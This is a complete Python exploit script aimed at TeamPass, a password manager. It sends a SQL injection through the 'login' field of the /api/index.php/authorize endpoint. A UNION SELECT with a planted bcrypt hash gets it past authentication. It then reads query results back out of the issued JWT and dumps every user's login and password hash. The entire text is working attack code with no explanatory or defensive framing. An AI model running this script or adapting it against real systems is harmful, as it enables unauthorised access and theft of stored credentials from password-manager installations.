import sys import requests import base64 import re import json import subprocess def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} ") sys.exit(1) base_url = sys.argv[1] vulnerable_url = f"{base_url}/api/index.php/authorize" try: response = requests.get(vulnerable_url) if "API usage is not allowed" in response.text: print("API feature is not enabled :-(") sys.exit(1) except requests.RequestException as e: print(f"Error: {e}") sys.exit(1) # Generate arbitrary hash arbitrary_hash = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq' def exec_sql(query): inject = f"none' UNION SELECT id, '{arbitrary_hash}', ({query}), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin" data = { "login": inject, "password": "h4ck3d", "apikey": "foo" } headers = {"Content-Type": "application/json"} try: response = requests.post(vulnerable_url, headers=headers, json=data) response.raise_for_status() token = response.json().get('token', '') if not token: return None # Extract public_key from token parts = token.split('.') if len(parts) < 2: return None payload = parts[1] # Fix padding if necessary payload += '=' * ((4 - len(payload) % 4) % 4) decoded = base64.b64decode(payload) public_key = json.loads(decoded).get('public_key', '') return public_key except requests.RequestException as e: print(f"Error: {e}") return None users = exec_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''") if users is None: print("Failed to get user count") sys.exit(1) print(f"There are {users} users in the system:") for i in range(int(users)): username = exec_sql(f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1") password = exec_sql(f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1") if username is not None and password is not None: print(f"{username}: {password}") if __name__ == "__main__": main()